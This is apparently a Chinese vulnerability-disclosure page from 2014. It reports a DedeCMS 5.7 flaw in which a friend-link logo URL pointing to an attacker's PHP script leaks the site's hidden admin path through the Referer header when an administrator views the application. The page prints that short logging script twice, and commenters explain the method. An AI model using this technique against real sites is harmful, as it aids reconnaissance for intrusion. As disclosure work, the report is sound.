漏洞概要
关注数(24)
关注此漏洞
漏洞标题:织梦某处设计缺陷导致后台地址泄露
提交时间:2014-09-19 14:26
修复时间:2014-12-15 14:28
公开时间:2014-12-15 14:28
漏洞类型:设计缺陷/逻辑错误
危害等级:高
自评Rank:15
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
Tags标签:
无
漏洞详情
披露状态:
2014-09-19: 细节已通知厂商并且等待厂商处理中
2014-09-24: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2014-11-18: 细节向核心白帽子及相关领域专家公开
2014-11-28: 细节向普通白帽子公开
2014-12-08: 细节向实习白帽子公开
2014-12-15: 细节向公众公开
简要描述:
某处设计缺陷,程序对某些东西过滤不严,导致后台地址泄露,仅测试了5.7。目测其它版本同样存在问题。
详细说明:
DEDECMS对友情链接申请的LOGO地址没有进行严格的判断和过滤,导致可以提交PHP、ASP等后缀。
且后台查看友情链接时,如下图所示,图片仍是申请时提交的URL。
X.PHP 代码:
<?php
file_put_contents('x.txt',$_SERVER['HTTP_REFERER']);
header("Content-type:image/jpeg");
$img=imagecreatefromjpeg("x.jpg");
imagejpeg($img);
imagedestroy($img);
?>
当访问该文件,获取$_SERVER['HTTP_REFERER'],并且写出文件到X.TXT。
漏洞证明:
X.PHP 代码:
<?php
file_put_contents('x.txt',$_SERVER['HTTP_REFERER']);
header("Content-type:image/jpeg");
$img=imagecreatefromjpeg("x.jpg");
imagejpeg($img);
imagedestroy($img);
?>
当访问该文件,获取$_SERVER['HTTP_REFERER'],并且写出文件到X.TXT。
修复方案:
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2014-12-15 14:28
厂商回复:
最新状态:
暂无
漏洞评价:
评论
-
2014-09-19 14:27 |
袋鼠妈妈 ( 普通白帽子 | Rank:449 漏洞数:61 | 故乡的原风景.MP3)
-
2014-09-19 14:38 |
玉林嘎 ( 普通白帽子 | Rank:758 漏洞数:96 )
-
2014-09-19 15:15 |
赈早见琥珀主 ( 实习白帽子 | Rank:33 漏洞数:5 )
-
2014-09-19 15:21 |
U神 ( 核心白帽子 | Rank:1285 漏洞数:142 | 感谢乌云,知恩不忘,其实我一直都在乌云默...)
-
2014-09-19 15:30 |
Safe ( 路人 | Rank:0 漏洞数:1 | 一个平凡的人)
-
2014-09-19 15:31 |
铁蛋火车侠 ( 普通白帽子 | Rank:156 漏洞数:31 | Q群371620085 技术交流群 有漂亮妹纸!)
-
2014-09-19 15:56 |
Walle ( 路人 | Rank:0 漏洞数:5 | ... 位卑、未敢忘忧国! ...)
-
2014-09-19 16:15 |
Grayon ( 路人 | Rank:4 漏洞数:4 | 今天怎么不开心 :)
-
2014-09-20 07:49 |
bey0nd ( 普通白帽子 | Rank:895 漏洞数:142 | 相忘于江湖,不如相濡以沫)
-
2014-09-22 10:22 |
menmen519 ( 普通白帽子 | Rank:762 漏洞数:146 | http://menmen519.blog.sohu.com/)
-
2014-09-23 20:18 |
Azui ( 路人 | Rank:25 漏洞数:10 | 用一只黑色铅笔画一出舞台默剧。)
-
2014-09-25 10:50 |
微尘 ( 普通白帽子 | Rank:218 漏洞数:74 )
-
2014-09-25 10:50 |
微尘 ( 普通白帽子 | Rank:218 漏洞数:74 )
@MuZhU0 直接漏点吧,不用怕我们会LJ你的。放心我们都不是什么好人
-
2014-09-25 17:54 |
MuZhU0 ( 路人 | Rank:6 漏洞数:4 )
-
2014-09-26 09:01 |
发条橙子 ( 路人 | Rank:19 漏洞数:6 | ∑(っ °Д °;)っ)
-
2014-09-26 14:04 |
emeditor ( 路人 | Rank:2 漏洞数:1 | 过来乌云学习 求大神别黑)
-
2014-09-26 20:59 |
老和尚 ( 普通白帽子 | Rank:223 漏洞数:45 | 总有一天,我会骑着雨牛@'雨。踩着一哥@jan...)
-
2014-09-26 22:09 |
风情万种 ( 普通白帽子 | Rank:181 漏洞数:63 | 不再相信爱了)
-
2014-09-27 10:56 |
lck丶 ( 路人 | Rank:6 漏洞数:2 | 求大牛拿0day砸死)
-
2014-09-27 14:33 |
微尘 ( 普通白帽子 | Rank:218 漏洞数:74 )
-
2014-09-27 18:09 |
MuZhU0 ( 路人 | Rank:6 漏洞数:4 )
@微尘 既然忽略了,就说了吧。友情链接申请哪里可以提交PHP文件,管理员后台看友情链接申请的时候,PHP获取来源页就行了。
-
2014-09-27 18:16 |
风情万种 ( 普通白帽子 | Rank:181 漏洞数:63 | 不再相信爱了)
-
2014-09-27 20:45 |
MuZhU0 ( 路人 | Rank:6 漏洞数:4 )
-
2014-09-27 20:50 |
Azui ( 路人 | Rank:25 漏洞数:10 | 用一只黑色铅笔画一出舞台默剧。)
@MuZhU0 我记得之前就有人发过 通过流量统计那边查看管理员访问的链接,原理一样,鸡肋- -。
-
2014-10-02 21:21 |
铁汉 ( 路人 | Rank:12 漏洞数:6 | 向各种大神学习之)
-
2014-10-11 14:37 |
D&G ( 普通白帽子 | Rank:523 漏洞数:103 | going)
-
2014-10-11 15:57 |
0x334 ( 普通白帽子 | Rank:171 漏洞数:35 | 漏洞无影响,已忽略~~~~~~~)
-
2014-10-13 14:32 |
shack2 ( 普通白帽子 | Rank:470 漏洞数:71 | QQ:1341413415 一个热爱编程(Java),热爱网...)
-
2014-10-14 11:25 |
chowner ( 路人 | Rank:4 漏洞数:2 | 运维工程师 兼职搞安全)
-
2014-12-15 14:37 |
老黑 ( 普通白帽子 | Rank:161 漏洞数:61 | 最爱红颜不老。)
图片也可以查看REFFER啊 为什么一定要ASP PHP呢
-
2014-12-15 17:46 |
MuZhU0 ( 路人 | Rank:6 漏洞数:4 )
-
2014-12-24 17:47 |
Mxx ( 路人 | Rank:0 漏洞数:2 | 没有)
-
2014-12-25 08:58 |
带我玩 ( 路人 | Rank:12 漏洞数:6 | 带我玩)
-
2015-01-17 10:22 |
Sofia ( 路人 | Rank:25 漏洞数:6 | 不会渗透的SEOer不是好站长)
-
2015-01-17 10:22 |
Sofia ( 路人 | Rank:25 漏洞数:6 | 不会渗透的SEOer不是好站长)
-
2015-01-18 15:34 |
Mxx ( 路人 | Rank:0 漏洞数:2 | 没有)
-
2015-01-18 16:11 |
Sofia ( 路人 | Rank:25 漏洞数:6 | 不会渗透的SEOer不是好站长)
@Mxx 这个很简单啊,就是远程链接一个自己服务器的php文件,管理访问后台那个地方的时候就会加载这个php,然后自己这个php文件同目录会生成x.txt文件,里面记录了referer,就是后台路径
-
2015-01-19 14:36 |
Mxx ( 路人 | Rank:0 漏洞数:2 | 没有)
-
2015-01-22 15:24 |
xsjswt ( 普通白帽子 | Rank:156 漏洞数:49 | 我思故我猥琐,我猥琐故我强大)
这个没用啊,就算后缀是图片的,服务器是我控制的,依然可以抓到referer
-
2015-08-05 23:07 |
乌帽子 ( 路人 | Rank:29 漏洞数:3 | 学习黑客哪家强 | 中国山东找蓝翔 | sql...)
这个没用啊,就算后缀是图片的,服务器是我控制的,依然可以抓到referer
-
2015-08-24 14:57 |
鬼五 ( 普通白帽子 | Rank:214 漏洞数:83 )